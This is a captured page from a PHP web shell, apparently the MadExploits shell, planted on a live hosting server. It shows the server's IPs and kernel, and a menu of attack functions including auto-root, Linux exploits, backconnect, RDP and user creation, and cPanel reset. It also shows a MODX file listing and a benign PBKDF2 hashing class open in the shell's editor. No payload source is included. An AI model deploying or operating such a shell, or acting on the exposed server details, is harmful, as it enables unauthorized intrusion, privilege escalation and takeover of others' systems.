Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.143.239.63
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
modx /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
10.35
KB
-rw-r--r--
clone.php
8.02
KB
-rw-r--r--
config.core.php
287
B
-rw-r--r--
config.inc.php
3.14
KB
-rw-r--r--
edit.php
5.33
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.64
KB
-rw-r--r--
fileindex.php
72
B
-rw-r--r--
import.php
3.86
KB
-rw-r--r--
info.xml
3.78
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.49
KB
-rw-r--r--
install.xml
1.05
KB
-rw-r--r--
md5
1.4
KB
-rw-r--r--
modhashing.class.php
6.16
KB
-rw-r--r--
modpbkdf2.class.php
2.45
KB
-rw-r--r--
notes.txt
1.52
KB
-rw-r--r--
update_pass.php
672
B
-rw-r--r--
upgrade.php
4.02
KB
-rw-r--r--
upgrade.xml
436
B
-rw-r--r--
xpdo.class.php
129.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modpbkdf2.class.php
<?php /** * This file contains a modHash implementation of RSA PDKDF2. * @package modx * @subpackage hashing */ /** * A PBKDF2 implementation of modHash. * * {@inheritdoc} * * @package modx * @subpackage hashing */ class modPBKDF2 extends modHash { /** * Generate a hash of a string using the RSA PBKDFA2 specification. * * The following options are available: * - salt (required): a valid, non-empty string to salt the hashes * - iterations: the number of iterations per block, default is 1000 (< 1000 not recommended) * - derived_key_length: the size of the derived key to generate, default is 32 * - algorithm: the hash algorithm to use, default is sha256 * - raw_output: if true, returns binary output, otherwise derived key is base64_encode()'d; default is false * * @param string $string A string to generate a secure hash from. * @param array $options An array of options to be passed to the hash implementation. * @return mixed The hash result or false on failure. */ public function hash($string, array $options = array()) { $derivedKey = false; $salt = $this->getOption('salt', $options, false); if (is_string($salt) && strlen($salt) > 0) { $iterations = (integer) $this->getOption('iterations', $options, 1000); $derivedKeyLength = (integer) $this->getOption('derived_key_length', $options, 32); $algorithm = $this->getOption('algorithm', $options, 'sha256'); $hashLength = strlen(hash($algorithm, null, true)); $keyBlocks = ceil($derivedKeyLength / $hashLength); $derivedKey = ''; for ($block = 1; $block <= $keyBlocks; $block++) { $hashBlock = $hb = hash_hmac($algorithm, $salt . pack('N', $block), $string, true); for ($blockIteration = 1; $blockIteration < $iterations; $blockIteration++) { $hashBlock ^= ($hb = hash_hmac($algorithm, $hb, $string, true)); } $derivedKey .= $hashBlock; } $derivedKey = substr($derivedKey, 0, $derivedKeyLength); if (!$this->getOption('raw_output', $options, false)) { $derivedKey = base64_encode($derivedKey); } } else { $this->host->modx->log(modX::LOG_LEVEL_ERROR, "PBKDF2 requires a valid salt string.", '', __METHOD__, __FILE__, __LINE__); } return $derivedKey; } }
Close